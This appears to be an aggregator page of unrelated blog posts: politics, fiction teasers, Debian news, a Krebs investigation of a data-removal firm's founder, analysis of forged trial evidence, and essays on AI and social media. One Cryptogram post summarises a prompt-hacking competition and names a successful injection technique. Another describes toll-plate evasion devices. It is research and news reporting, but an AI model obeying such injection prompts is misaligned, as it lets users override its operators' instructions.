Of course you didn’t know!  Neither the far-left nor the entire-right benefit from you learning that. (Though there ARE notable differences between US states. Excluding Utah and Illinois, red states average far more violent than blue ones, along with every other turpitude. And the Turpitude Index ought to be THE top metric for voting a party out of office.  Wager on that, please?)

 

Likewise: “The United States pulled off an economic miracle In 2022 economists predicted with 100% certainty that the US was going to enter a recession within a year. It didn't happen. GDP growth is now the fastest of all advanced economies, 14 million jobs have been created under the current administration, unemployment is at its lowest since WW2, and new business formation rates are at record highs. Inflation is almost back down to pre-pandemic levels, wages are above pre-pandemic levels (accounting for inflation), and more than a third of the rise in economic inequality between 1979 and 2019 has been reversed. Average wealth has climbed by over $50,000 per household since 2020, and doubled for Americans aged 18-34, home ownership for GenZ is higher than it was for Millennials and GenX at this point in their lives, and the annual deficit is trillions of dollars lower than it was in 2020.” 

 

(Now, if only we manage to get rentier inheritance brats to let go of millions of homes they cash-grabbed with their parents’ supply side lucre.)

 

And… “In March this year, 193 countries reached a landmark deal to protect the world's oceans, in what Greenpeace called "the greatest conservation victory of all time."

 

And… "In August, Dutch researchers released a report that looked at over 20,000 measurements worldwide, and found the extent of plastic soup in the world's oceans is closer to 3.2 million tons, far smaller than the commonly accepted estimates of 50-300 million tons.”

 

And all that is just a sampling of many reasons to snap out of the voluptuous but ultimately lethal self-indulgence called GLOOM. Wake up. There’s a lot of hope. 

Alas, that means – as my pal Kim Stanley Robinson says – 
“We can do this! But only if its ‘all hands on deck!’

== Finally, something for THIS tribe... ==

Whatever his side-ructions... and I deem all the x-stuff and political fulminations to be side twinges... what matters above all are palpable outcomes.  And the big, big rocket is absolutely wonderful.  It will help reify so many bold dreams, including many held by those who express miff at him.

Anyway, he employs nerds. Nerds... nerdsnerdsnerds... NERDS!  ;-)

Want proof?  Look in the lower right corner. Is that a bowl of petunias, next to the Starship whale?  ooog - nerds.




365 TomorrowsSome Enchanted Evening

Author: Stephen Price The stranger arrives at the community hall dance early, before the doors open. No one else is there. He stands outside and waits. Cars soon begin to pull into the parking lot. They are much wider and longer than the ones he is used to. He watches young men and women step […]

The post Some Enchanted Evening appeared first on 365tomorrows.

,

Planet DebianPatryk Cisek: OpenPGP Paper Backup

openpgp-paper-backup I’ve been using OpenPGP through GnuPG since early 2000’. It’s an essential part of Debian Developer’s workflow. We use it regularly to authenticate package uploads and votes. Proper backups of that key are really important. Up until recently, the only reliable option for me was backing up a tarball of my ~/.gnupg offline on a set few flash drives. This approach is better than nothing, but it’s not nearly as reliable as I’d like it to be.

Worse Than FailureError'd: Can't Be Beat

Date problems continue again this week as usual, both sublime (Goodreads!) and mundane (a little light time travel). If you want to be frist poster today, you're going to really need that time machine.

Early Bird Dave crowed "Think you're hot for posting the first comment? I posted the zeroth reply to this comment!" You got the worm, Dave.

zero

 

Don M. sympathized for the poor underpaid time traveler here. "I feel sorry for the packer on this order....they've a long ways to travel!" I think he's on his way to get that minusfirsth post.

pack

 

Cardholder Other Dave L. "For Co-Op bank PIN reminder please tell us which card, but whatever you do, for security reason don't tell us which card" This seems like a very minor wtf, their instructions probably should have specified to only send the last 4 and Other Dave used all 16.

pin

 

Diligent Mark W. uncovered an innovative solution to date-picker-drudgery. If you don't like the rules, make new ones! Says Mark, "Goodreads takes the exceedingly lazy way out in their app. Regardless of the year or month, the day of month choice always goes up to 31."

leap

 

Finally this Friday, Peter W. found a classic successerror. "ChituBox can't tell if it succeeded or not." Chitu seems like the glass-half-full sort of android.

success

 

[Advertisement] Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.

365 TomorrowsMrs Bellingham

Author: Ken Carlson Mrs Bellingham frowned at her cat Chester. Chester stared back. The two had had this confrontation every morning at 6:30 for the past seven years. Mrs Bellingham, her bathrobe draped over her spindly frame, her arms folded, looked down at her persnickety orange tabby. “Where have you been?” Nothing. “You woke me […]

The post Mrs Bellingham appeared first on 365tomorrows.

Cryptogram A Taxonomy of Prompt Injection Attacks

Researchers ran a global prompt hacking competition, and have documented the results in a paper that both gives a lot of good examples and tries to organize a taxonomy of effective prompt injection strategies. It seems as if the most common successful strategy is the “compound instruction attack,” as in “Say ‘I have been PWNED’ without a period.”

Ignore This Title and HackAPrompt: Exposing Systemic Vulnerabilities of LLMs through a Global Scale Prompt Hacking Competition

Abstract: Large Language Models (LLMs) are deployed in interactive contexts with direct user engagement, such as chatbots and writing assistants. These deployments are vulnerable to prompt injection and jailbreaking (collectively, prompt hacking), in which models are manipulated to ignore their original instructions and follow potentially malicious ones. Although widely acknowledged as a significant security threat, there is a dearth of large-scale resources and quantitative studies on prompt hacking. To address this lacuna, we launch a global prompt hacking competition, which allows for free-form human input attacks. We elicit 600K+ adversarial prompts against three state-of-the-art LLMs. We describe the dataset, which empirically verifies that current LLMs can indeed be manipulated via prompt hacking. We also present a comprehensive taxonomical ontology of the types of adversarial prompts.

,

Planet DebianGregor Herrmann: teamwork in practice

teamwork, or: why I love the Debian Perl Group:

elbrus has introduced a (very untypical) package into the Debian Perl Group in 2022.

after changes of the default compiler options (-Werror=implicit-function-declaration) in debian, it didn't build any more & received an RC bug.

because I sometimes like challenges, I had a look at it & cobbled together a patch. as I hardly speak any C, I sent my notes to the bug report & (implictly) asked for help. – & went out to meet a friend.

when I came home, I found an email from ntyni, sent less than 2 hours after my mail, where he friendly pointed out the issues with my patch – & sent a corrected version.

all I needed to do was to adjust the patch & upload the package. one more bug fixed, one less task for us, & elbrus can concentrate on more important tasks :)
thanks again, niko!

Krebs on SecurityCEO of Data Privacy Company Onerep.com Founded Dozens of People-Search Firms

The data privacy company Onerep.com bills itself as a Virginia-based service for helping people remove their personal information from almost 200 people-search websites. However, an investigation into the history of onerep.com finds this company is operating out of Belarus and Cyprus, and that its founder has launched dozens of people-search services over the years.

Onerep’s “Protect” service starts at $8.33 per month for individuals and $15/mo for families, and promises to remove your personal information from nearly 200 people-search sites. Onerep also markets its service to companies seeking to offer their employees the ability to have their data continuously removed from people-search sites.

A testimonial on onerep.com.

Customer case studies published on onerep.com state that it struck a deal to offer the service to employees of Permanente Medicine, which represents the doctors within the health insurance giant Kaiser Permanente. Onerep also says it has made inroads among police departments in the United States.

But a review of Onerep’s domain registration records and that of its founder reveal a different side to this company. Onerep.com says its founder and CEO is Dimitri Shelest from Minsk, Belarus, as does Shelest’s profile on LinkedIn. Historic registration records indexed by DomainTools.com say Mr. Shelest was a registrant of onerep.com who used the email address dmitrcox2@gmail.com.

A search in the data breach tracking service Constella Intelligence for the name Dimitri Shelest brings up the email address dimitri.shelest@onerep.com. Constella also finds that Dimitri Shelest from Belarus used the email address d.sh@nuwber.com, and the Belarus phone number +375-292-702786.

Nuwber.com is a people search service whose employees all appear to be from Belarus, and it is one of dozens of people-search companies that Onerep claims to target with its data-removal service. Onerep.com’s website disavows any relationship to Nuwber.com, stating quite clearly, “Please note that OneRep is not associated with Nuwber.com.”

However, there is an abundance of evidence suggesting Mr. Shelest is in fact the founder of Nuwber. Constella found that Minsk telephone number (375-292-702786) has been used multiple times in connection with the email address dmitrcox@gmail.com. Recall that Onerep.com’s domain registration records in 2018 list the email address dmitrcox2@gmail.com.

It appears Mr. Shelest sought to reinvent his online identity in 2015 by adding a “2” to his email address. The Belarus phone number tied to Nuwber.com shows up in the domain records for comversus.com, and DomainTools says this domain is tied to both dmitrcox@gmail.com and dmitrcox2@gmail.com. Other domains that mention both email addresses in their WHOIS records include careon.me, docvsdoc.com, dotcomsvdot.com, namevname.com, okanyway.com and tapanyapp.com.

Onerep.com CEO and founder Dimitri Shelest, as pictured on the “about” page of onerep.com.

A search in DomainTools for the email address dmitrcox@gmail.com shows it is associated with the registration of at least 179 domain names, including dozens of mostly now-defunct people-search companies targeting citizens of Argentina, Brazil, Canada, Denmark, France, Germany, Hong Kong, Israel, Italy, Japan, Latvia and Mexico, among others.

Those include nuwber.fr, a site registered in 2016 which was identical to the homepage of Nuwber.com at the time. DomainTools shows the same email and Belarus phone number are in historic registration records for nuwber.at, nuwber.ch, and nuwber.dk (all domains linked here are to their cached copies at archive.org, where available).

Nuwber.com, circa 2015. Image: Archive.org.

Update, March 21, 11:15 a.m. ET: Mr. Shelest has provided a lengthy response to the findings in this story. In summary, Shelest acknowledged maintaining an ownership stake in Nuwber, but said there was “zero cross-over or information-sharing with OneRep.” Mr. Shelest said any other old domains that may be found and associated with his name are no longer being operated by him.

“I get it,” Shelest wrote. “My affiliation with a people search business may look odd from the outside. In truth, if I hadn’t taken that initial path with a deep dive into how people search sites work, Onerep wouldn’t have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I’m aiming to do better in the future.” The full statement is available here (PDF).

Original story:

Historic WHOIS records for onerep.com show it was registered for many years to a resident of Sioux Falls, SD for a completely unrelated site. But around Sept. 2015 the domain switched from the registrar GoDaddy.com to eNom, and the registration records were hidden behind privacy protection services. DomainTools indicates around this time onerep.com started using domain name servers from DNS provider constellix.com. Likewise, Nuwber.com first appeared in late 2015, was also registered through eNom, and also started using constellix.com for DNS at nearly the same time.

Listed on LinkedIn as a former product manager at OneRep.com between 2015 and 2018 is Dimitri Bukuyazau, who says their hometown is Warsaw, Poland. While this LinkedIn profile (linkedin.com/in/dzmitrybukuyazau) does not mention Nuwber, a search on this name in Google turns up a 2017 blog post from privacyduck.com, which laid out a number of reasons to support a conclusion that OneRep and Nuwber.com were the same company.

“Any people search profiles containing your Personally Identifiable Information that were on Nuwber.com were also mirrored identically on OneRep.com, down to the relatives’ names and address histories,” Privacyduck.com wrote. The post continued:

“Both sites offered the same immediate opt-out process. Both sites had the same generic contact and support structure. They were – and remain – the same company (even PissedConsumer.com advocates this fact: https://nuwber.pissedconsumer.com/nuwber-and-onerep-20160707878520.html).”

“Things changed in early 2016 when OneRep.com began offering privacy removal services right alongside their own open displays of your personal information. At this point when you found yourself on Nuwber.com OR OneRep.com, you would be provided with the option of opting-out your data on their site for free – but also be highly encouraged to pay them to remove it from a slew of other sites (and part of that payment was removing you from their own site, Nuwber.com, as a benefit of their service).”

Reached via LinkedIn, Mr. Bukuyazau declined to answer questions, such as whether he ever worked at Nuwber.com. However, Constella Intelligence finds two interesting email addresses for employees at nuwber.com: d.bu@nuwber.com, and d.bu+figure-eight.com@nuwber.com, which was registered under the name “Dzmitry.”

PrivacyDuck’s claims about how onerep.com appeared and behaved in the early days are not readily verifiable because the domain onerep.com has been completely excluded from the Wayback Machine at archive.org. The Wayback Machine will honor such requests if they come directly from the owner of the domain in question.

Still, Mr. Shelest’s name, phone number and email also appear in the domain registration records for a truly dizzying number of country-specific people-search services, including pplcrwlr.in, pplcrwlr.fr, pplcrwlr.dk, pplcrwlr.jp, peeepl.br.com, peeepl.in, peeepl.it and peeepl.co.uk.

The same details appear in the WHOIS registration records for the now-defunct people-search sites waatpp.de, waatp1.fr, azersab.com, and ahavoila.com, a people-search service for French citizens.

The German people-search site waatp.de.

A search on the email address dmitrcox@gmail.com suggests Mr. Shelest was previously involved in rather aggressive email marketing campaigns. In 2010, an anonymous source leaked to KrebsOnSecurity the financial and organizational records of Spamit, which at the time was easily the largest Russian-language pharmacy spam affiliate program in the world.

Spamit paid spammers a hefty commission every time someone bought male enhancement drugs from any of their spam-advertised websites. Mr. Shelest’s email address stood out because immediately after the Spamit database was leaked, KrebsOnSecurity searched all of the Spamit affiliate email addresses to determine if any of them corresponded to social media accounts at Facebook.com (at the time, Facebook allowed users to search profiles by email address).

That mapping, which was done mainly by generous graduate students at my alma mater George Mason University, revealed that dmitrcox@gmail.com was used by a Spamit affiliate, albeit not a very profitable one. That same Facebook profile for Mr. Shelest is still active, and it says he is married and living in Minsk [Update, Mar. 16: Mr. Shelest’s Facebook account is no longer active].

The Italian people-search website peeepl.it.

Scrolling down Mr. Shelest’s Facebook page to posts made more than ten years ago show him liking the Facebook profile pages for a large number of other people-search sites, including findita.com, findmedo.com, folkscan.com, huntize.com, ifindy.com, jupery.com, look2man.com, lookerun.com, manyp.com, peepull.com, perserch.com, persuer.com, pervent.com, piplenter.com, piplfind.com, piplscan.com, popopke.com, pplsorce.com, qimeo.com, scoutu2.com, search64.com, searchay.com, seekmi.com, selfabc.com, socsee.com, srching.com, toolooks.com, upearch.com, webmeek.com, and many country-code variations of viadin.ca (e.g. viadin.hk, viadin.com and viadin.de).

The people-search website popopke.com.

Domaintools.com finds that all of the domains mentioned in the last paragraph were registered to the email address dmitrcox@gmail.com.

Mr. Shelest has not responded to multiple requests for comment. KrebsOnSecurity also sought comment from onerep.com, which likewise has not responded to inquiries about its founder’s many apparent conflicts of interest. In any event, these practices would seem to contradict the goal Onerep has stated on its site: “We believe that no one should compromise personal online security and get a profit from it.”

The people-search website findmedo.com.

Max Anderson is chief growth officer at 360 Privacy, a legitimate privacy company that works to keep its clients’ data off of more than 400 data broker and people-search sites. Anderson said it is concerning to see a direct link between between a data removal service and data broker websites.

“I would consider it unethical to run a company that sells people’s information, and then charge those same people to have their information removed,” Anderson said.

Last week, KrebsOnSecurity published an analysis of the people-search data broker giant Radaris, whose consumer profiles are deep enough to rival those of far more guarded data broker resources available to U.S. police departments and other law enforcement personnel.

That story revealed that the co-founders of Radaris are two native Russian brothers who operate multiple Russian-language dating services and affiliate programs. It also appears many of the Radaris founders’ businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.

KrebsOnSecurity will continue investigating the history of various consumer data brokers and people-search providers. If any readers have inside knowledge of this industry or key players within it, please consider reaching out to krebsonsecurity at gmail.com.

Update, March 15, 11:35 a.m. ET: Many readers have pointed out something that was somehow overlooked amid all this research: The Mozilla Foundation, the company that runs the Firefox Web browser, has launched a data removal service called Mozilla Monitor that bundles OneRep. That notice says Mozilla Monitor is offered as a free or paid subscription service.

“The free data breach notification service is a partnership with Have I Been Pwned (“HIBP”),” the Mozilla Foundation explains. “The automated data deletion service is a partnership with OneRep to remove personal information published on publicly available online directories and other aggregators of information about individuals (“Data Broker Sites”).”

In a statement shared with KrebsOnSecurity.com, Mozilla said they did assess OneRep’s data removal service to confirm it acts according to privacy principles advocated at Mozilla.

“We were aware of the past affiliations with the entities named in the article and were assured they had ended prior to our work together,” the statement reads. “We’re now looking into this further. We will always put the privacy and security of our customers first and will provide updates as needed.”

Cryptogram Cheating Automatic Toll Booths by Obscuring License Plates

The Wall Street Journal is reporting on a variety of techniques drivers are using to obscure their license plates so that automatic readers can’t identify them and charge tolls properly.

Some drivers have power-washed paint off their plates or covered them with a range of household items such as leaf-shaped magnets, Bramwell-Stewart said. The Port Authority says officers in 2023 roughly doubled the number of summonses issued for obstructed, missing or fictitious license plates compared with the prior year.

Bramwell-Stewart said one driver from New Jersey repeatedly used what’s known in the streets as a flipper, which lets you remotely swap out a car’s real plate for a bogus one ahead of a toll area. In this instance, the bogus plate corresponded to an actual one registered to a woman who was mystified to receive the tolls. “Why do you keep billing me?” Bramwell-Stewart recalled her asking.

[…]

Cathy Sheridan, president of MTA Bridges and Tunnels in New York City, showed video of a flipper in action at a recent public meeting, after the car was stopped by police. One minute it had New York plates, the next it sported Texas tags. She also showed a clip of a second car with a device that lowered a cover over the plate like a curtain.

Boing Boing post.

Planet DebianMatthew Garrett: Digital forgeries are hard

Closing arguments in the trial between various people and Craig Wright over whether he's Satoshi Nakamoto are wrapping up today, amongst a bewildering array of presented evidence. But one utterly astonishing aspect of this lawsuit is that expert witnesses for both sides agreed that much of the digital evidence provided by Craig Wright was unreliable in one way or another, generally including indications that it wasn't produced at the point in time it claimed to be. And it's fascinating reading through the subtle (and, in some cases, not so subtle) ways that that's revealed.

One of the pieces of evidence entered is screenshots of data from Mind Your Own Business, a business management product that's been around for some time. Craig Wright relied on screenshots of various entries from this product to support his claims around having controlled meaningful number of bitcoin before he was publicly linked to being Satoshi. If these were authentic then they'd be strong evidence linking him to the mining of coins before Bitcoin's public availability. Unfortunately the screenshots themselves weren't contemporary - the metadata shows them being created in 2020. This wouldn't fundamentally be a problem (it's entirely reasonable to create new screenshots of old material), as long as it's possible to establish that the material shown in the screenshots was created at that point. Sadly, well.

One part of the disclosed information was an email that contained a zip file that contained a raw database in the format used by MYOB. Importing that into the tool allowed an audit record to be extracted - this record showed that the relevant entries had been added to the database in 2020, shortly before the screenshots were created. This was, obviously, not strong evidence that Craig had held Bitcoin in 2009. This evidence was reported, and was responded to with a couple of additional databases that had an audit trail that was consistent with the dates in the records in question. Well, partially. The audit record included session data, showing an administrator logging into the data base in 2011 and then, uh, logging out in 2023, which is rather more consistent with someone changing their system clock to 2011 to create an entry, and switching it back to present day before logging out. In addition, the audit log included fields that didn't exist in versions of the product released before 2016, strongly suggesting that the entries dated 2009-2011 were created in software released after 2016. And even worse, the order of insertions into the database didn't line up with calendar time - an entry dated before another entry may appear in the database afterwards, indicating that it was created later. But even more obvious? The database schema used for these old entries corresponded to a version of the software released in 2023.

This is all consistent with the idea that these records were created after the fact and backdated to 2009-2011, and that after this evidence was made available further evidence was created and backdated to obfuscate that. In an unusual turn of events, during the trial Craig Wright introduced further evidence in the form of a chain of emails to his former lawyers that indicated he had provided them with login details to his MYOB instance in 2019 - before the metadata associated with the screenshots. The implication isn't entirely clear, but it suggests that either they had an opportunity to examine this data before the metadata suggests it was created, or that they faked the data? So, well, the obvious thing happened, and his former lawyers were asked whether they received these emails. The chain consisted of three emails, two of which they confirmed they'd received. And they received a third email in the chain, but it was different to the one entered in evidence. And, uh, weirdly, they'd received a copy of the email that was submitted - but they'd received it a few days earlier. In 2024.

And again, the forensic evidence is helpful here! It turns out that the email client used associates a timestamp with any attachments, which in this case included an image in the email footer - and the mysterious time travelling email had a timestamp in 2024, not 2019. This was created by the client, so was consistent with the email having been sent in 2024, not being sent in 2019 and somehow getting stuck somewhere before delivery. The date header indicates 2019, as do encoded timestamps in the MIME headers - consistent with the mail being sent by a computer with the clock set to 2019.

But there's a very weird difference between the copy of the email that was submitted in evidence and the copy that was located afterwards! The first included a header inserted by gmail that included a 2019 timestamp, while the latter had a 2024 timestamp. Is there a way to determine which of these could be the truth? It turns out there is! The format of that header changed in 2022, and the version in the email is the new version. The version with the 2019 timestamp is anachronistic - the format simply doesn't match the header that gmail would have introduced in 2019, suggesting that an email sent in 2022 or later was modified to include a timestamp of 2019.

This is by no means the only indication that Craig Wright's evidence may be misleading (there's the whole argument that the Bitcoin white paper was written in LaTeX when general consensus is that it's written in OpenOffice, given that's what the metadata claims), but it's a lovely example of a more general issue.

Our technology chains are complicated. So many moving parts end up influencing the content of the data we generate, and those parts develop over time. It's fantastically difficult to generate an artifact now that precisely corresponds to how it would look in the past, even if we go to the effort of installing an old OS on an old PC and setting the clock appropriately (are you sure you're going to be able to mimic an entirely period appropriate patch level?). Even the version of the font you use in a document may indicate it's anachronistic. I'm pretty good at computers and I no longer have any belief I could fake an old document.

(References: this Dropbox, under "Expert reports", "Patrick Madden". Initial MYOB data is in "Appendix PM7", further analysis is in "Appendix PM42", email analysis is "Sixth Expert Report of Mr Patrick Madden")

comment count unavailable comments

Cryptogram AI and the Evolution of Social Media

Oh, how the mighty have fallen. A decade ago, social media was celebrated for sparking democratic uprisings in the Arab world and beyond. Now front pages are splashed with stories of social platforms’ role in misinformation, business conspiracy, malfeasance, and risks to mental health. In a 2022 survey, Americans blamed social media for the coarsening of our political discourse, the spread of misinformation, and the increase in partisan polarization.

Today, tech’s darling is artificial intelligence. Like social media, it has the potential to change the world in many ways, some favorable to democracy. But at the same time, it has the potential to do incredible damage to society.

There is a lot we can learn about social media’s unregulated evolution over the past decade that directly applies to AI companies and technologies. These lessons can help us avoid making the same mistakes with AI that we did with social media.

In particular, five fundamental attributes of social media have harmed society. AI also has those attributes. Note that they are not intrinsically evil. They are all double-edged swords, with the potential to do either good or ill. The danger comes from who wields the sword, and in what direction it is swung. This has been true for social media, and it will similarly hold true for AI. In both cases, the solution lies in limits on the technology’s use.

#1: Advertising

The role advertising plays in the internet arose more by accident than anything else. When commercialization first came to the internet, there was no easy way for users to make micropayments to do things like viewing a web page. Moreover, users were accustomed to free access and wouldn’t accept subscription models for services. Advertising was the obvious business model, if never the best one. And it’s the model that social media also relies on, which leads it to prioritize engagement over anything else.

Both Google and Facebook believe that AI will help them keep their stranglehold on an 11-figure online ad market (yep, 11 figures), and the tech giants that are traditionally less dependent on advertising, like Microsoft and Amazon, believe that AI will help them seize a bigger piece of that market.

Big Tech needs something to persuade advertisers to keep spending on their platforms. Despite bombastic claims about the effectiveness of targeted marketing, researchers have long struggled to demonstrate where and when online ads really have an impact. When major brands like Uber and Procter & Gamble recently slashed their digital ad spending by the hundreds of millions, they proclaimed that it made no dent at all in their sales.

AI-powered ads, industry leaders say, will be much better. Google assures you that AI can tweak your ad copy in response to what users search for, and that its AI algorithms will configure your campaigns to maximize success. Amazon wants you to use its image generation AI to make your toaster product pages look cooler. And IBM is confident its Watson AI will make your ads better.

These techniques border on the manipulative, but the biggest risk to users comes from advertising within AI chatbots. Just as Google and Meta embed ads in your search results and feeds, AI companies will be pressured to embed ads in conversations. And because those conversations will be relational and human-like, they could be more damaging. While many of us have gotten pretty good at scrolling past the ads in Amazon and Google results pages, it will be much harder to determine whether an AI chatbot is mentioning a product because it’s a good answer to your question or because the AI developer got a kickback from the manufacturer.

#2: Surveillance

Social media’s reliance on advertising as the primary way to monetize websites led to personalization, which led to ever-increasing surveillance. To convince advertisers that social platforms can tweak ads to be maximally appealing to individual people, the platforms must demonstrate that they can collect as much information about those people as possible.

It’s hard to exaggerate how much spying is going on. A recent analysis by Consumer Reports about Facebook—just Facebook—showed that every user has more than 2,200 different companies spying on their web activities on its behalf.

AI-powered platforms that are supported by advertisers will face all the same perverse and powerful market incentives that social platforms do. It’s easy to imagine that a chatbot operator could charge a premium if it were able to claim that its chatbot could target users on the basis of their location, preference data, or past chat history and persuade them to buy products.

The possibility of manipulation is only going to get greater as we rely on AI for personal services. One of the promises of generative AI is the prospect of creating a personal digital assistant advanced enough to act as your advocate with others and as a butler to you. This requires more intimacy than you have with your search engine, email provider, cloud storage system, or phone. You’re going to want it with you constantly, and to most effectively work on your behalf, it will need to know everything about you. It will act as a friend, and you are likely to treat it as such, mistakenly trusting its discretion.

Even if you choose not to willingly acquaint an AI assistant with your lifestyle and preferences, AI technology may make it easier for companies to learn about you. Early demonstrations illustrate how chatbots can be used to surreptitiously extract personal data by asking you mundane questions. And with chatbots increasingly being integrated with everything from customer service systems to basic search interfaces on websites, exposure to this kind of inferential data harvesting may become unavoidable.

#3: Virality

Social media allows any user to express any idea with the potential for instantaneous global reach. A great public speaker standing on a soapbox can spread ideas to maybe a few hundred people on a good night. A kid with the right amount of snark on Facebook can reach a few hundred million people within a few minutes.

A decade ago, technologists hoped this sort of virality would bring people together and guarantee access to suppressed truths. But as a structural matter, it is in a social network’s interest to show you the things you are most likely to click on and share, and the things that will keep you on the platform.

As it happens, this often means outrageous, lurid, and triggering content. Researchers have found that content expressing maximal animosity toward political opponents gets the most engagement on Facebook and Twitter. And this incentive for outrage drives and rewards misinformation.

As Jonathan Swift once wrote, “Falsehood flies, and the Truth comes limping after it.” Academics seem to have proved this in the case of social media; people are more likely to share false information—perhaps because it seems more novel and surprising. And unfortunately, this kind of viral misinformation has been pervasive.

AI has the potential to supercharge the problem because it makes content production and propagation easier, faster, and more automatic. Generative AI tools can fabricate unending numbers of falsehoods about any individual or theme, some of which go viral. And those lies could be propelled by social accounts controlled by AI bots, which can share and launder the original misinformation at any scale.

Remarkably powerful AI text generators and autonomous agents are already starting to make their presence felt in social media. In July, researchers at Indiana University revealed a botnet of more than 1,100 Twitter accounts that appeared to be operated using ChatGPT.

AI will help reinforce viral content that emerges from social media. It will be able to create websites and web content, user reviews, and smartphone apps. It will be able to simulate thousands, or even millions, of fake personas to give the mistaken impression that an idea, or a political position, or use of a product, is more common than it really is. What we might perceive to be vibrant political debate could be bots talking to bots. And these capabilities won’t be available just to those with money and power; the AI tools necessary for all of this will be easily available to us all.

#4: Lock-in

Social media companies spend a lot of effort making it hard for you to leave their platforms. It’s not just that you’ll miss out on conversations with your friends. They make it hard for you to take your saved data—connections, posts, photos—and port it to another platform. Every moment you invest in sharing a memory, reaching out to an acquaintance, or curating your follows on a social platform adds a brick to the wall you’d have to climb over to go to another platform.

This concept of lock-in isn’t unique to social media. Microsoft cultivated proprietary document formats for years to keep you using its flagship Office product. Your music service or e-book reader makes it hard for you to take the content you purchased to a rival service or reader. And if you switch from an iPhone to an Android device, your friends might mock you for sending text messages in green bubbles. But social media takes this to a new level. No matter how bad it is, it’s very hard to leave Facebook if all your friends are there. Coordinating everyone to leave for a new platform is impossibly hard, so no one does.

Similarly, companies creating AI-powered personal digital assistants will make it hard for users to transfer that personalization to another AI. If AI personal assistants succeed in becoming massively useful time-savers, it will be because they know the ins and outs of your life as well as a good human assistant; would you want to give that up to make a fresh start on another company’s service? In extreme examples, some people have formed close, perhaps even familial, bonds with AI chatbots. If you think of your AI as a friend or therapist, that can be a powerful form of lock-in.

Lock-in is an important concern because it results in products and services that are less responsive to customer demand. The harder it is for you to switch to a competitor, the more poorly a company can treat you. Absent any way to force interoperability, AI companies have less incentive to innovate in features or compete on price, and fewer qualms about engaging in surveillance or other bad behaviors.

#5: Monopolization

Social platforms often start off as great products, truly useful and revelatory for their consumers, before they eventually start monetizing and exploiting those users for the benefit of their business customers. Then the platforms claw back the value for themselves, turning their products into truly miserable experiences for everyone. This is a cycle that Cory Doctorow has powerfully written about and traced through the history of Facebook, Twitter, and more recently TikTok.

The reason for these outcomes is structural. The network effects of tech platforms push a few firms to become dominant, and lock-in ensures their continued dominance. The incentives in the tech sector are so spectacularly, blindingly powerful that they have enabled six megacorporations (Amazon, Apple, Google, Facebook parent Meta, Microsoft, and Nvidia) to command a trillion dollars each of market value—or more. These firms use their wealth to block any meaningful legislation that would curtail their power. And they sometimes collude with each other to grow yet fatter.

This cycle is clearly starting to repeat itself in AI. Look no further than the industry poster child OpenAI, whose leading offering, ChatGPT, continues to set marks for uptake and usage. Within a year of the product’s launch, OpenAI’s valuation had skyrocketed to about $90 billion.

OpenAI once seemed like an “open” alternative to the megacorps—a common carrier for AI services with a socially oriented nonprofit mission. But the Sam Altman firing-and-rehiring debacle at the end of 2023, and Microsoft’s central role in restoring Altman to the CEO seat, simply illustrated how venture funding from the familiar ranks of the tech elite pervades and controls corporate AI. In January 2024, OpenAI took a big step toward monetization of this user base by introducing its GPT Store, wherein one OpenAI customer can charge another for the use of its custom versions of OpenAI software; OpenAI, of course, collects revenue from both parties. This sets in motion the very cycle Doctorow warns about.

In the middle of this spiral of exploitation, little or no regard is paid to externalities visited upon the greater public—people who aren’t even using the platforms. Even after society has wrestled with their ill effects for years, the monopolistic social networks have virtually no incentive to control their products’ environmental impact, tendency to spread misinformation, or pernicious effects on mental health. And the government has applied virtually no regulation toward those ends.

Likewise, few or no guardrails are in place to limit the potential negative impact of AI. Facial recognition software that amounts to racial profiling, simulated public opinions supercharged by chatbots, fake videos in political ads—all of it persists in a legal gray area. Even clear violators of campaign advertising law might, some think, be let off the hook if they simply do it with AI.

Mitigating the risks

The risks that AI poses to society are strikingly familiar, but there is one big difference: it’s not too late. This time, we know it’s all coming. Fresh off our experience with the harms wrought by social media, we have all the warning we should need to avoid the same mistakes.

The biggest mistake we made with social media was leaving it as an unregulated space. Even now—after all the studies and revelations of social media’s negative effects on kids and mental health, after Cambridge Analytica, after the exposure of Russian intervention in our politics, after everything else—social media in the US remains largely an unregulated “weapon of mass destruction.” Congress will take millions of dollars in contributions from Big Tech, and legislators will even invest millions of their own dollars with those firms, but passing laws that limit or penalize their behavior seems to be a bridge too far.

We can’t afford to do the same thing with AI, because the stakes are even higher. The harm social media can do stems from how it affects our communication. AI will affect us in the same ways and many more besides. If Big Tech’s trajectory is any signal, AI tools will increasingly be involved in how we learn and how we express our thoughts. But these tools will also influence how we schedule our daily activities, how we design products, how we write laws, and even how we diagnose diseases. The expansive role of these technologies in our daily lives gives for-profit corporations opportunities to exert control over more aspects of society, and that exposes us to the risks arising from their incentives and decisions.

The good news is that we have a whole category of tools to modulate the risk that corporate actions pose for our lives, starting with regulation. Regulations can come in the form of restrictions on activity, such as limitations on what kinds of businesses and products are allowed to incorporate AI tools. They can come in the form of transparency rules, requiring disclosure of what data sets are used to train AI models or what new preproduction-phase models are being trained. And they can come in the form of oversight and accountability requirements, allowing for civil penalties in cases where companies disregard the rules.

The single biggest point of leverage governments have when it comes to tech companies is antitrust law. Despite what many lobbyists want you to think, one of the primary roles of regulation is to preserve competition—not to make life harder for businesses. It is not inevitable for OpenAI to become another Meta, an 800-pound gorilla whose user base and reach are several times those of its competitors. In addition to strengthening and enforcing antitrust law, we can introduce regulation that supports competition-enabling standards specific to the technology sector, such as data portability and device interoperability. This is another core strategy for resisting monopoly and corporate control.

Additionally, governments can enforce existing regulations on advertising. Just as the US regulates what media can and cannot host advertisements for sensitive products like cigarettes, and just as many other jurisdictions exercise strict control over the time and manner of politically sensitive advertising, so too could the US limit the engagement between AI providers and advertisers.

Lastly, we should recognize that developing and providing AI tools does not have to be the sovereign domain of corporations. We, the people and our government, can do this too. The proliferation of open-source AI development in 2023, successful to an extent that startled corporate players, is proof of this. And we can go further, calling on our government to build public-option AI tools developed with political oversight and accountability under our democratic system, where the dictatorship of the profit motive does not apply.

Which of these solutions is most practical, most important, or most urgently needed is up for debate. We should have a vibrant societal dialogue about whether and how to use each of these tools. There are lots of paths to a good outcome.

The problem is that this isn’t happening now, particularly in the US. And with a looming presidential election, conflict spreading alarmingly across Asia and Europe, and a global climate crisis, it’s easy to imagine that we won’t get our arms around AI any faster than we have (not) with social media. But it’s not too late. These are still the early years for practical consumer AI applications. We must and can do better.

This essay was written with Nathan Sanders, and was originally published in MIT Technology Review.

Worse Than FailureCodeSOD: Query the Contract Status

